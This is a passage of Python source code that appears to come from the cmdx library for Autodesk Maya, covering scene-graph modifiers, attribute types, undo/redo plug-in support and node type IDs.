as_hex = asHex
# Helpful for euler rotations
degrees = math.degrees
radians = math.radians
sin = math.sin
cos = math.cos
tan = math.tan
pi = math.pi
def meters(cm):
"""Centimeters (Maya's default unit) to Meters
Example:
>>> meters(100)
1.0
"""
return cm * 0.01
def clear():
"""Remove all reused nodes"""
Singleton._instances.clear()
def _encode1(path):
"""Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
"""
selectionList = om1.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
mobject = om1.MObject()
selectionList.getDependNode(0, mobject)
return mobject
def _encodedagpath1(path):
"""Convert `path` to Maya API 1.0 MObject
Arguments:
path (str): Absolute or relative path to DAG or DG node
Raises:
ExistError on `path` not existing
"""
selectionList = om1.MSelectionList()
try:
selectionList.add(path)
except RuntimeError:
raise ExistError("'%s' does not exist" % path)
dagpath = om1.MDagPath()
selectionList.getDagPath(0, dagpath)
return dagpath
def decode(node):
"""Convert cmdx Node to shortest unique path
This is the same as `node.shortestPath()`
To get an absolute path, use `node.path()`
"""
try:
return node.shortestPath()
except AttributeError:
return node.name(namespace=True)
def record_history(func):
@wraps(func)
def decorator(self, *args, **kwargs):
_kwargs = kwargs.copy()
_args = list(args)
# Don't store actual objects,
# to facilitate garbage collection.
for index, arg in enumerate(args):
if isinstance(arg, (Node, Plug)):
_args[index] = arg.path()
else:
_args[index] = repr(arg)
for key, value in kwargs.items():
if isinstance(value, (Node, Plug)):
_kwargs[key] = value.path()
else:
_kwargs[key] = repr(value)
self._history.append((func.__name__, _args, _kwargs))
return func(self, *args, **kwargs)
return decorator
class _BaseModifier(object):
"""Interactively edit an existing scenegraph with support for undo/redo
Arguments:
undoable (bool, optional): Put undoIt on the undo queue
interesting (bool, optional): New nodes should appear
in the channelbox
debug (bool, optional): Include additional debug data,
at the expense of performance
atomic (bool, optional): Automatically rollback changes on failure
template (str, optional): Automatically name new nodes using
this template
"""
Type = om.MDGModifier
def __enter__(self):
self.isContext = True
return self
def __exit__(self, exc_type, exc_value, tb):
# Support calling `doIt` during a context,
# without polluting the undo queue.
if self.isContext and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
self.doIt()
def __init__(self,
undoable=True,
interesting=True,
debug=True,
atomic=True,
template=None):
super(_BaseModifier, self).__init__()
self.isDone = False
self.isContext = False
self._modifier = self.Type()
self._history = list()
self._index = 1
self._opts = {
"undoable": undoable,
"interesting": interesting,
"debug": debug,
"atomic": atomic,
"template": template,
}
def doIt(self):
if (not self.isContext) and self._opts["undoable"]:
commit(self._modifier.undoIt, self._modifier.doIt)
try:
self._modifier.doIt()
except RuntimeError:
# Rollback changes
if self._opts["atomic"]:
self.undoIt()
raise ModifierError(self._history)
self.isDone = True
def undoIt(self):
self._modifier.undoIt()
@record_history
def createNode(self, type, name=None):
try:
mobj = self._modifier.createNode(type)
except TypeError:
raise TypeError("'%s' is not a valid node type" % type)
template = self._opts["template"]
if name or template:
name = (template or "{name}").format(
name=name or "",
type=type,
index=self._index,
)
self._modifier.renameNode(mobj, name)
node = Node(mobj, exists=False, modifier=self)
if not self._opts["interesting"]:
plug = node["isHistoricallyInteresting"]
_python_to_mod(False, plug, self._modifier)
self._index += 1
return node
@record_history
def deleteNode(self, node):
return self._modifier.deleteNode(node._mobject)
delete = deleteNode
@record_history
def renameNode(self, node, name):
return self._modifier.renameNode(node._mobject, name)
rename = renameNode
@record_history
def setAttr(self, plug, value):
if isinstance(value, Plug):
value = value.read()
if isinstance(plug, om.MPlug):
value = Plug(plug.node(), plug).read()
_python_to_mod(value, plug, self._modifier)
def resetAttr(self, plug):
self.setAttr(plug, plug.default)
@record_history
def connect(self, src, dst, force=True):
if isinstance(src, Plug):
src = src._mplug
if isinstance(dst, Plug):
dst = dst._mplug
if force:
# Disconnect any plug connected to `other`
for plug in dst.connectedTo(True, False):
self.disconnect(plug, dst)
self._modifier.connect(src, dst)
@record_history
def disconnect(self, a, b=None, source=True, destination=True):
"""Disconnect `a` from `b`
Arguments:
a (Plug): Starting point of a connection
b (Plug, optional): End point of a connection, defaults to all
source (bool, optional): Disconnect b, if it is a source
source (bool, optional): Disconnect b, if it is a destination
Normally, Maya only performs a disconnect if the
connection is incoming. Bidirectional
disconnect(A, B) => OK
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
disconnect(B, A) => NO
__________ _________
| | | |
| nodeA o---->o nodeB |
|__________| |_________|
"""
if isinstance(a, Plug):
a = a._mplug
if isinstance(b, Plug):
b = b._mplug
if b is None:
# Disconnect any plug connected to `other`
if source:
for plug in a.connectedTo(True, False):
self._modifier.disconnect(plug, a)
if destination:
for plug in a.connectedTo(False, True):
self._modifier.disconnect(a, plug)
else:
if source:
self._modifier.disconnect(a, b)
if destination:
self._modifier.disconnect(b, a)
if ENABLE_PEP8:
do_it = doIt
undo_it = undoIt
create_node = createNode
delete_node = deleteNode
rename_node = renameNode
set_attr = setAttr
reset_attr = resetAttr
class DGModifier(_BaseModifier):
"""Modifier for DG nodes"""
Type = om.MDGModifier
class DagModifier(_BaseModifier):
"""Modifier for DAG nodes
Example:
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... mod.setAttr(node1["translate"], (1, 2, 3))
... mod.connect(node1 + ".translate", node2 + ".translate")
...
>>> getAttr(node1 + ".translateX")
1.0
>>> node2["translate"][0]
1.0
>>> node2["translate"][1]
2.0
>>> with DagModifier() as mod:
... node1 = mod.createNode("transform")
... node2 = mod.createNode("transform", parent=node1)
... node1["translate"] = (5, 6, 7)
... node1["translate"] >> node2["translate"]
...
>>> node2["translate"][0]
5.0
>>> node2["translate"][1]
6.0
Example, without context manager:
>>> mod = DagModifier()
>>> parent = mod.createNode("transform")
>>> shape = mod.createNode("transform", parent=parent)
>>> mod.connect(parent["tz"], shape["tz"])
>>> mod.setAttr(parent["sx"], 2.0)
>>> parent["tx"] >> shape["ty"]
>>> parent["tx"] = 5.1
>>> round(shape["ty"], 1) # Not yet created nor connected
0.0
>>> mod.doIt()
>>> round(shape["ty"], 1)
5.1
>>> round(parent["sx"])
2.0
Duplicate names are resolved, even though nodes haven't yet been created:
>>> _ = cmds.file(new=True, force=True)
>>> with DagModifier() as mod:
... node = mod.createNode("transform", name="NotUnique")
... node1 = mod.createNode("transform", name="NotUnique")
... node2 = mod.createNode("transform", name="NotUnique")
...
>>> node.name() == "NotUnique"
True
>>> node1.name() == "NotUnique1"
True
>>> node2.name() == "NotUnique2"
True
Deletion works too
>>> _ = cmds.file(new=True, force=True)
>>> mod = DagModifier()
>>> parent = mod.createNode("transform", name="myParent")
>>> child = mod.createNode("transform", name="myChild", parent=parent)
>>> mod.doIt()
>>> "myParent" in cmds.ls()
True
>>> "myChild" in cmds.ls()
True
>>> parent.child().name()
u'myChild'
>>> mod = DagModifier()
>>> _ = mod.delete(child)
>>> mod.doIt()
>>> parent.child() is None
True
>>> "myChild" in cmds.ls()
False
"""
Type = om.MDagModifier
@record_history
def createNode(self, type, name=None, parent=None):
parent = parent._mobject if parent else om.MObject.kNullObj
try:
mobj = self._modifier.createNode(type, parent)
except TypeError:
raise TypeError("'%s' is not a valid node type" % type)
template = self._opts["template"]
if name or template:
name = (template or "{name}").format(
name=name or "",
type=type,
index=self._index,
)
self._modifier.renameNode(mobj, name)
return DagNode(mobj, exists=False, modifier=self)
@record_history
def parent(self, node, parent=None):
parent = parent._mobject if parent is not None else None
self._modifier.reparentNode(node._mobject, parent)
if ENABLE_PEP8:
create_node = createNode
class DGContext(om.MDGContext):
def __init__(self, time=None):
"""Context for evaluating the Maya DG
Extension of MDGContext to also accept time as a float. In Maya 2018
and above DGContext can also be used as a context manager.
Arguments:
time (float, om.MTime, optional): Time at which to evaluate context
"""
if time is not None:
if isinstance(time, (int, float)):
time = om.MTime(time, om.MTime.uiUnit())
super(DGContext, self).__init__(time)
else:
super(DGContext, self).__init__()
self._previousContext = None
def __enter__(self):
if __maya_version__ >= 2018:
self._previousContext = self.makeCurrent()
return self
else:
cmds.error(
"'%s' does not support context manager functionality for Maya 2017 "
"and below" % self.__class__.__name__
)
def __exit__(self, exc_type, exc_value, tb):
if self._previousContext:
self._previousContext.makeCurrent()
# Alias
Context = DGContext
def ls(*args, **kwargs):
return map(encode, cmds.ls(*args, **kwargs))
def selection(*args, **kwargs):
return map(encode, cmds.ls(*args, selection=True, **kwargs))
def createNode(type, name=None, parent=None):
"""Create a new node
This function forms the basic building block
with which to create new nodes in Maya.
.. note:: Missing arguments `shared` and `skipSelect`
.. tip:: For additional performance, `type` may be given as an MTypeId
Arguments:
type (str): Type name of new node, e.g. "transform"
name (str, optional): Sets the name of the newly-created node
parent (Node, optional): Specifies the parent in the DAG under which
the new node belongs
Example:
>>> node = createNode("transform") # Type as string
>>> node = createNode(tTransform) # Type as ID
"""
try:
with DagModifier() as mod:
node = mod.createNode(type, name=name, parent=parent)
except TypeError:
with DGModifier() as mod:
node = mod.createNode(type, name=name)
return node
def getAttr(attr, type=None, time=None):
"""Read `attr`
Arguments:
attr (Plug): Attribute as a cmdx.Plug
type (str, optional): Unused
time (float, optional): Time at which to evaluate the attribute
Example:
>>> node = createNode("transform")
>>> getAttr(node + ".translateX")
0.0
"""
return attr.read(time=time)
def setAttr(attr, value, type=None):
"""Write `value` to `attr`
Arguments:
attr (Plug): Existing attribute to edit
value (any): Value to write
type (int, optional): Unused
Example:
>>> node = createNode("transform")
>>> setAttr(node + ".translateX", 5.0)
"""
attr.write(value)
def addAttr(node,
longName,
attributeType,
shortName=None,
enumName=None,
defaultValue=None):
"""Add new attribute to `node`
Arguments:
node (Node): Add attribute to this node
longName (str): Name of resulting attribute
attributeType (str): Type of attribute, e.g. `string`
shortName (str, optional): Alternate name of attribute
enumName (str, optional): Options for an enum attribute
defaultValue (any, optional): Default value of attribute
Example:
>>> node = createNode("transform")
>>> addAttr(node, "myString", attributeType="string")
>>> addAttr(node, "myDouble", attributeType=Double)
"""
at = attributeType
if isinstance(at, type) and issubclass(at, _AbstractAttribute):
Attribute = attributeType
else:
# Support legacy maya.cmds interface
Attribute = {
"double": Double,
"double3": Double3,
"string": String,
"long": Long,
"bool": Boolean,
"enume": Enum,
}[attributeType]
kwargs = {
"default": defaultValue
}
if enumName:
kwargs["fields"] = enumName.split(":")
attribute = Attribute(longName, **kwargs)
node.addAttr(attribute)
def listRelatives(node,
type=None,
children=False,
allDescendents=False,
parent=False,
shapes=False):
"""List relatives of `node`
Arguments:
node (DagNode): Node to enquire about
type (int, optional): Only return nodes of this type
children (bool, optional): Return children of `node`
parent (bool, optional): Return parent of `node`
shapes (bool, optional): Return only children that are shapes
allDescendents (bool, optional): Return descendents of `node`
fullPath (bool, optional): Unused; nodes are always exact
path (bool, optional): Unused; nodes are always exact
Example:
>>> parent = createNode("transform")
>>> child = createNode("transform", parent=parent)
>>> listRelatives(child, parent=True) == [parent]
True
"""
if not isinstance(node, DagNode):
return None
elif allDescendents:
return list(node.descendents(type=type))
elif shapes:
return list(node.shapes(type=type))
elif parent:
return [node.parent(type=type)]
elif children:
return list(node.children(type=type))
def listConnections(attr):
"""List connections of `attr`
Arguments:
attr (Plug or Node):
Example:
>>> node1 = createNode("transform")
>>> node2 = createNode("mesh", parent=node1)
>>> node1["v"] >> node2["v"]
>>> listConnections(node1) == [node2]
True
>>> listConnections(node1 + ".v") == [node2]
True
>>> listConnections(node1["v"]) == [node2]
True
>>> listConnections(node2) == [node1]
True
"""
return list(node for node in attr.connections())
def connectAttr(src, dst):
"""Connect `src` to `dst`
Arguments:
src (Plug): Source plug
dst (Plug): Destination plug
Example:
>>> src = createNode("transform")
>>> dst = createNode("transform")
>>> connectAttr(src + ".rotateX", dst + ".scaleY")
"""
src.connect(dst)
def delete(*nodes):
with DGModifier() as mod:
for node in nodes:
mod.delete(node)
def rename(node, name):
with DGModifier() as mod:
mod.rename(node, name)
def parent(children, parent, relative=True, absolute=False):
assert isinstance(parent, DagNode), "parent must be DagNode"
if not isinstance(children, (tuple, list)):
children = [children]
for child in children:
assert isinstance(child, DagNode), "child must be DagNode"
parent.addChild(child)
def objExists(obj):
if isinstance(obj, (Node, Plug)):
obj = obj.path()
try:
om.MSelectionList().add(obj)
except RuntimeError:
return False
else:
return True
# PEP08
sl = selection
create_node = createNode
get_attr = getAttr
set_attr = setAttr
add_attr = addAttr
list_relatives = listRelatives
list_connections = listConnections
connect_attr = connectAttr
obj_exists = objExists
# Speciality functions
kOpen = om1.MFnNurbsCurve.kOpen
kClosed = om1.MFnNurbsCurve.kClosed
kPeriodic = om1.MFnNurbsCurve.kPeriodic
def editCurve(parent, points, degree=1, form=kOpen):
assert isinstance(parent, DagNode), (
"parent must be of type cmdx.DagNode"
)
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
curveFn = om1.MFnNurbsCurve()
for point in points:
cvs.append(om1.MPoint(*point))
mobj = curveFn.createWithEditPoints(cvs,
degree,
form,
False,
False,
True,
_encode1(parent.path()))
mod = om1.MDagModifier()
mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
mod.doIt()
def undo():
mod.deleteNode(mobj)
mod.doIt()
def redo():
mod.undoIt()
commit(undo, redo)
shapeFn = om1.MFnDagNode(mobj)
return encode(shapeFn.fullPathName())
def curve(parent, points, degree=1, form=kOpen):
"""Create a NURBS curve from a series of points
Arguments:
parent (DagNode): Parent to resulting shape node
points (list): One tuples per point, with 3 floats each
degree (int, optional): Degree of curve, 1 is linear
form (int, optional): Whether to close the curve or not
Example:
>>> parent = createNode("transform")
>>> shape = curve(parent, [
... (0, 0, 0),
... (0, 1, 0),
... (0, 2, 0),
... ])
...
"""
assert isinstance(parent, DagNode), (
"parent must be of type cmdx.DagNode"
)
assert parent._modifier is None or parent._modifier.isDone, (
"curve() currently doesn't work with a modifier"
)
# Superimpose end knots
# startpoints = [points[0]] * (degree - 1)
# endpoints = [points[-1]] * (degree - 1)
# points = startpoints + list(points) + endpoints
degree = min(3, max(1, degree))
cvs = om1.MPointArray()
knots = om1.MDoubleArray()
curveFn = om1.MFnNurbsCurve()
knotcount = len(points) - degree + 2 * degree - 1
for point in points:
cvs.append(om1.MPoint(*point))
for index in range(knotcount):
knots.append(index)
mobj = curveFn.create(cvs,
knots,
degree,
form,
False,
True,
_encode1(parent.path()))
mod = om1.MDagModifier()
mod.renameNode(mobj, parent.name(namespace=True) + "Shape")
mod.doIt()
def undo():
mod.deleteNode(mobj)
mod.doIt()
def redo():
mod.undoIt()
commit(undo, redo)
shapeFn = om1.MFnDagNode(mobj)
return encode(shapeFn.fullPathName())
def lookAt(origin, center, up=None):
"""Build a (left-handed) look-at matrix
See glm::glc::matrix_transform::lookAt for reference
+ Z (up)
/
/
(origin) o------ + X (center)
\
+ Y
Arguments:
origin (Vector): Starting position
center (Vector): Point towards this
up (Vector, optional): Up facing this way, defaults to Y-up
Example:
>>> mat = lookAt(
... (0, 0, 0), # Relative the origin..
... (1, 0, 0), # X-axis points towards global X
... (0, 1, 0) # Z-axis points towards global Y
... )
>>> tm = Tm(mat)
>>> int(degrees(tm.rotation().x))
-90
"""
if isinstance(origin, (tuple, list)):
origin = Vector(origin)
if isinstance(center, (tuple, list)):
center = Vector(center)
if up is not None and isinstance(up, (tuple, list)):
up = Vector(up)
up = up or Vector(0, 1, 0)
x = (center - origin).normalize()
y = ((center - origin) ^ (center - up)).normalize()
z = x ^ y
return MatrixType((
x[0], x[1], x[2], 0,
y[0], y[1], y[2], 0,
z[0], z[1], z[2], 0,
0, 0, 0, 0
))
if ENABLE_PEP8:
look_at = lookAt
def first(iterator, default=None):
"""Return first member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> first(it())
1
"""
return next(iterator, default)
def last(iterator, default=None):
"""Return last member of an `iterator`
Example:
>>> def it():
... yield 1
... yield 2
... yield 3
...
>>> last(it())
3
"""
last = default
for member in iterator:
last = member
return last
# --------------------------------------------------------
#
# Attribute Types
#
# --------------------------------------------------------
class _AbstractAttribute(dict):
Fn = None
Type = None
Default = None
Readable = True
Writable = True
Cached = True # Cache in datablock?
Storable = True # Write value to file?
Hidden = False # Display in Attribute Editor?
Array = False
Connectable = True
Keyable = True
ChannelBox = False
AffectsAppearance = False
AffectsWorldSpace = False
Help = ""
def __eq__(self, other):
try:
# Support Attribute -> Attribute comparison
return self["name"] == other["name"]
except AttributeError:
# Support Attribute -> string comparison
return self["name"] == other
def __ne__(self, other):
try:
return self["name"] != other["name"]
except AttributeError:
return self["name"] != other
def __hash__(self):
"""Support storing in set()"""
return hash(self["name"])
def __repr__(self):
"""Avoid repr depicting the full contents of this dict"""
return self["name"]
def __new__(cls, *args, **kwargs):
"""Support for using name of assignment
Example:
node["thisName"] = cmdx.Double()
In this example, the attribute isn't given a `name`
Instead, the name is inferred from where it is assigned.
"""
if not args:
return cls, kwargs
return super(_AbstractAttribute, cls).__new__(cls, *args, **kwargs)
def __init__(self,
name,
default=None,
label=None,
writable=None,
readable=None,
cached=None,
storable=None,
keyable=None,
hidden=None,
min=None,
max=None,
channelBox=None,
affectsAppearance=None,
affectsWorldSpace=None,
array=False,
connectable=True,
help=None):
args = locals().copy()
args.pop("self")
self["name"] = args.pop("name")
self["label"] = args.pop("label")
self["default"] = args.pop("default")
# Exclusive to numeric attributes
self["min"] = args.pop("min")
self["max"] = args.pop("max")
# Filled in on creation
self["mobject"] = None
# MyName -> myName
self["shortName"] = self["name"][0].lower() + self["name"][1:]
for key, value in args.items():
default = getattr(self, key[0].upper() + key[1:])
self[key] = value if value is not None else default
def default(self, cls=None):
"""Return one of three available values
Resolution order:
1. Argument
2. Node default (from cls.defaults)
3. Attribute default
"""
if self["default"] is not None:
return self["default"]
if cls is not None:
return cls.defaults.get(self["name"], self.Default)
return self.Default
def type(self):
return self.Type
def create(self, cls=None):
args = [
arg
for arg in (self["name"],
self["shortName"],
self.type())
if arg is not None
]
default = self.default(cls)
if default:
if isinstance(default, (list, tuple)):
args += default
else:
args += [default]
self["mobject"] = self.Fn.create(*args)
# 3 μs
self.Fn.storable = self["storable"]
self.Fn.readable = self["readable"]
self.Fn.writable = self["writable"]
self.Fn.connectable = self["connectable"]
self.Fn.hidden = self["hidden"]
self.Fn.cached = self["cached"]
self.Fn.keyable = self["keyable"]
self.Fn.channelBox = self["channelBox"]
self.Fn.affectsAppearance = self["affectsAppearance"]
self.Fn.affectsWorldSpace = self["affectsWorldSpace"]
self.Fn.array = self["array"]
if self["min"] is not None:
self.Fn.setMin(self["min"])
if self["max"] is not None:
self.Fn.setMax(self["max"])
if self["label"] is not None:
self.Fn.setNiceNameOverride(self["label"])
return self["mobject"]
def read(self, data):
pass
class Enum(_AbstractAttribute):
Fn = om.MFnEnumAttribute()
Type = None
Default = 0
Keyable = True
def __init__(self, name, fields=None, default=0, label=None, **kwargs):
super(Enum, self).__init__(name, default, label, **kwargs)
self.update({
"fields": fields or (name,),
})
def create(self, cls=None):
attr = super(Enum, self).create(cls)
for index, field in enumerate(self["fields"]):
self.Fn.addField(field, index)
return attr
def read(self, data):
return data.inputValue(self["mobject"]).asShort()
class Divider(Enum):
"""Visual divider in channel box"""
def __init__(self, label, **kwargs):
kwargs.pop("name", None)
kwargs.pop("fields", None)
kwargs.pop("label", None)
super(Divider, self).__init__(label, fields=(label,), label=" ", **kwargs)
class String(_AbstractAttribute):
Fn = om.MFnTypedAttribute()
Type = om.MFnData.kString
Default = ""
def default(self, cls=None):
default = str(super(String, self).default(cls))
return om.MFnStringData().create(default)
def read(self, data):
return data.inputValue(self["mobject"]).asString()
class Message(_AbstractAttribute):
Fn = om.MFnMessageAttribute()
Type = None
Default = None
Storable = False
class Matrix(_AbstractAttribute):
Fn = om.MFnMatrixAttribute()
Default = (0.0,) * 4 * 4 # Identity matrix
Array = False
Readable = True
Keyable = False
Hidden = False
def default(self, cls=None):
return None
def read(self, data):
return data.inputValue(self["mobject"]).asMatrix()
class Long(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kLong
Default = 0
def read(self, data):
return data.inputValue(self["mobject"]).asLong()
class Double(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kDouble
Default = 0.0
def read(self, data):
return data.inputValue(self["mobject"]).asDouble()
class Double3(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = None
Default = (0.0,) * 3
def default(self, cls=None):
if self["default"] is not None:
default = self["default"]
# Support single-value default
if not isinstance(default, (tuple, list)):
default = (default,) * 3
elif cls is not None:
default = cls.defaults.get(self["name"], self.Default)
else:
default = self.Default
children = list()
for index, child in enumerate("XYZ"):
attribute = self.Fn.create(self["name"] + child,
self["shortName"] + child,
om.MFnNumericData.kDouble,
default[index])
children.append(attribute)
return children
def read(self, data):
return data.inputValue(self["mobject"]).asDouble3()
class Boolean(_AbstractAttribute):
Fn = om.MFnNumericAttribute()
Type = om.MFnNumericData.kBoolean
Default = True
def read(self, data):
return data.inputValue(self["mobject"]).asBool()
class AbstractUnit(_AbstractAttribute):
Fn = om.MFnUnitAttribute()
Default = 0.0
Min = None
Max = None
SoftMin = None
SoftMax = None
class Angle(AbstractUnit):
def default(self, cls=None):
default = super(Angle, self).default(cls)
# When no unit was explicitly passed, assume degrees
if not isinstance(default, om.MAngle):
default = om.MAngle(default, om.MAngle.kDegrees)
return default
class Time(AbstractUnit):
def default(self, cls=None):
default = super(Time, self).default(cls)
# When no unit was explicitly passed, assume seconds
if not isinstance(default, om.MTime):
default = om.MTime(default, om.MTime.kSeconds)
return default
class Distance(AbstractUnit):
def default(self, cls=None):
default = super(Distance, self).default(cls)
# When no unit was explicitly passed, assume centimeters
if not isinstance(default, om.MDistance):
default = om.MDistance(default, om.MDistance.kCentimeters)
return default
class Compound(_AbstractAttribute):
Fn = om.MFnCompoundAttribute()
Multi = None
def __init__(self, name, children=None, **kwargs):
if not children and self.Multi:
default = kwargs.pop("default", None)
children, Type = self.Multi
children = tuple(
Type(name + child, default=default[index], **kwargs)
if default else Type(name + child, **kwargs)
for index, child in enumerate(children)
)
self["children"] = children
else:
self["children"] = children
super(Compound, self).__init__(name, **kwargs)
def default(self, cls=None):
# Compound itself has no defaults, only it's children do
pass
def create(self, cls=None):
mobj = super(Compound, self).create(cls)
default = super(Compound, self).default(cls)
for index, child in enumerate(self["children"]):
# Forward attributes from parent to child
for attr in ("storable",
"readable",
"writable",
"hidden",
"channelBox",
"keyable",
"array"):
child[attr] = self[attr]
if child["default"] is None and default is not None:
child["default"] = default[index]
self.Fn.addChild(child.create(cls))
return mobj
def read(self, handle):
"""Read from MDataHandle"""
output = list()
for child in self["children"]:
child_handle = handle.child(child["mobject"])
output.append(child.read(child_handle))
return tuple(output)
class Double2(Compound):
Multi = ("XY", Double)
class Double4(Compound):
Multi = ("XYZW", Double)
class Angle2(Compound):
Multi = ("XY", Angle)
class Angle3(Compound):
Multi = ("XYZ", Angle)
class Distance2(Compound):
Multi = ("XY", Distance)
class Distance3(Compound):
Multi = ("XYZ", Distance)
class Distance4(Compound):
Multi = ("XYZW", Distance)
# Convenience aliases, for when it isn't clear e.g. `Matrix()`
# is referring to an attribute rather than the datatype.
EnumAttribute = Enum
DividerAttribute = Divider
StringAttribute = String
MessageAttribute = Message
MatrixAttribute = Matrix
LongAttribute = Long
DoubleAttribute = Double
Double3Attribute = Double3
BooleanAttribute = Boolean
AbstractUnitAttribute = AbstractUnit
AngleAttribute = Angle
TimeAttribute = Time
DistanceAttribute = Distance
CompoundAttribute = Compound
Double2Attribute = Double2
Double4Attribute = Double4
Angle2Attribute = Angle2
Angle3Attribute = Angle3
Distance2Attribute = Distance2
Distance3Attribute = Distance3
Distance4Attribute = Distance4
# --------------------------------------------------------
#
# Undo/Redo Support
#
# NOTE: Localised version of apiundo.py 0.2.0
# https://github.com/mottosso/apiundo
#
# In Maya, history is maintained by "commands". Each command is an instance of
# MPxCommand that encapsulates a series of API calls coupled with their
# equivalent undo/redo API calls. For example, the `createNode` command
# is presumably coupled with `cmds.delete`, `setAttr` is presumably
# coupled with another `setAttr` with the previous values passed in.
#
# Thus, creating a custom command involves subclassing MPxCommand and
# implementing coupling your do, undo and redo into one neat package.
#
# cmdx however doesn't fit into this framework.
#
# With cmdx, you call upon API calls directly. There is little to no
# correlation between each of your calls, which is great for performance
# but not so great for conforming to the undo/redo framework set forth
# by Autodesk.
#
# To work around this, without losing out on performance or functionality,
# a generic command is created, capable of hosting arbitrary API calls
# and storing them in the Undo/Redo framework.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.delete(node))
#
# Now when you go to undo, the `lambda` is called. It is then up to you
# the developer to ensure that what is being undone actually relates
# to what you wanted to have undone. For example, it is perfectly
# possible to add an unrelated call to history.
#
# >>> node = cmdx.createNode("transform")
# >>> cmdx.commit(lambda: cmdx.setAttr(node + "translateX", 5))
#
# The result would be setting an attribute to `5` when attempting to undo.
#
# --------------------------------------------------------
# Support for multiple co-existing versions of apiundo.
# NOTE: This is important for vendoring, as otherwise a vendored apiundo
# could register e.g. cmds.apiUndo() first, causing a newer version
# to inadvertently use this older command (or worse yet, throwing an
# error when trying to register it again).
command = "_cmdxApiUndo_%s" % __version__.replace(".", "_")
# This module is both a Python module and Maya plug-in.
# Data is shared amongst the two through this "module"
name = "_cmdxShared_"
if name not in sys.modules:
sys.modules[name] = types.ModuleType(name)
shared = sys.modules[name]
shared.undo = None
shared.redo = None
shared.undos = {}
shared.redos = {}
def commit(undo, redo=lambda: None):
"""Commit `undo` and `redo` to history
Arguments:
undo (func): Call this function on next undo
redo (func, optional): Like `undo`, for for redo
"""
if not ENABLE_UNDO:
return
if not hasattr(cmds, command):
install()
# Precautionary measure.
# If this doesn't pass, odds are we've got a race condition.
# NOTE: This assumes calls to `commit` can only be done
# from a single thread, which should already be the case
# given that Maya's API is not threadsafe.
try:
assert shared.redo is None
assert shared.undo is None
except AssertionError:
log.debug("%s has a problem with undo" % __name__)
# Temporarily store the functions at shared-level,
# they are later picked up by the command once called.
shared.undo = "%x" % id(undo)
shared.redo = "%x" % id(redo)
shared.undos[shared.undo] = undo
shared.redos[shared.redo] = redo
# Let Maya know that something is undoable
getattr(cmds, command)()
def install():
"""Load this shared as a plug-in
Call this prior to using the shared
"""
if ENABLE_UNDO:
cmds.loadPlugin(__file__, quiet=True)
self.installed = True
def uninstall():
if ENABLE_UNDO:
# Plug-in may exist in undo queue and
# therefore cannot be unloaded until flushed.
cmds.flushUndo()
# Discard shared module
shared.undo = None
shared.redo = None
shared.undos.clear()
shared.redos.clear()
sys.modules.pop(name, None)
cmds.unloadPlugin(os.path.basename(__file__))
self.installed = False
def maya_useNewAPI():
pass
class _apiUndo(om.MPxCommand):
def doIt(self, args):
self.undo = shared.undo
self.redo = shared.redo
# Facilitate the above precautionary measure
shared.undo = None
shared.redo = None
def undoIt(self):
shared.undos[self.undo]()
def redoIt(self):
shared.redos[self.redo]()
def isUndoable(self):
# Without this, the above undoIt and redoIt will not be called
return True
def initializePlugin(plugin):
om.MFnPlugin(plugin).registerCommand(
command,
_apiUndo
)
def uninitializePlugin(plugin):
om.MFnPlugin(plugin).deregisterCommand(command)
# --------------------------------------------------------
#
# Commonly Node Types
#
# Creating a new node using a pre-defined Type ID is 10% faster
# than doing it using a string, but keeping all (~800) around
# has a negative impact on maintainability and readability of
# the project, so a balance is struck where only the most
# performance sensitive types are included here.
#
# Developers: See cmdt.py for a list of all available types and their IDs
#
# --------------------------------------------------------
tAddDoubleLinear = om.MTypeId(0x4441444c)
tAddMatrix = om.MTypeId(0x44414d58)
tAngleBetween = om.MTypeId(0x4e414254)
tBlendShape = om.MTypeId(0x46424c53)
tMultMatrix = om.MTypeId(0x444d544d)
tAngleDimension = om.MTypeId(0x4147444e)
tBezierCurve = om.MTypeId(0x42435256)
tCamera = om.MTypeId(0x4443414d)
tChoice = om.MTypeId(0x43484345)
tChooser = om.MTypeId(0x43484f4f)
tCondition = om.MTypeId(0x52434e44)
tMesh = om.MTypeId(0x444d5348)
tNurbsCurve = om.MTypeId(0x4e435256)
tNurbsSurface = om.MTypeId(0x4e535246)
tJoint = om.MTypeId(0x4a4f494e)
tTransform = om.MTypeId(0x5846524d)
tTransformGeometry = om.MTypeId(0x5447454f)
tWtAddMatrix = om.MTypeId(0x4457414d)
# --------------------------------------------------------
#
# Plug-ins
#
# --------------------------------------------------------
InstalledPlugins = dict()
TypeId = om.MTypeId
# Get your unique ID from Autodesk, the below
# should not be trusted for production.
StartId = int(os.getenv("CMDX_BASETYPEID", "0x12b9c0"), 0)
class MetaNode(type):
def __init__(cls, *args, **kwargs):
assert isinstance(cls.name, str)
assert isinstance(cls.defaults, dict)
assert isinstance(cls.attributes, list)
assert isinstance(cls.version, tuple)
if isinstance(cls.typeid, (int, float)):
cls.typeid = TypeId(cls.typeid)
# Support Divider plug-in, without name for readability.
# E.g. Divider("_", "Label") -> Divider("Label")
index = 1
for attribute in cls.attributes:
if isinstance(attribute, Divider):
attribute["name"] = "_" * index
attribute["shortName"] = "_" * index
index += 1
# Ensure no duplicates
assert len(set(cls.attributes)) == len(cls.attributes), (
"One or more attributes in '%s' was found more than once"
% cls.__name__
)
attributes = {attr["name"]: attr for attr in cls.attributes}
def findAttribute(self, name):
return attributes.get(name)
def findMObject(self, name):
return attributes.get(name)["mobject"]
def findPlug(self, node, name):
try:
mobj = attributes.get(name)["mobject"]
return om.MPlug(node, mobj)
except KeyError:
return None
cls.findAttribute = findAttribute
cls.findMObject = findMObject
cls.findPlug = findPlug
cls.find_attribute = findAttribute
cls.find_mobject = findMObject
cls.find_plug = findPlug
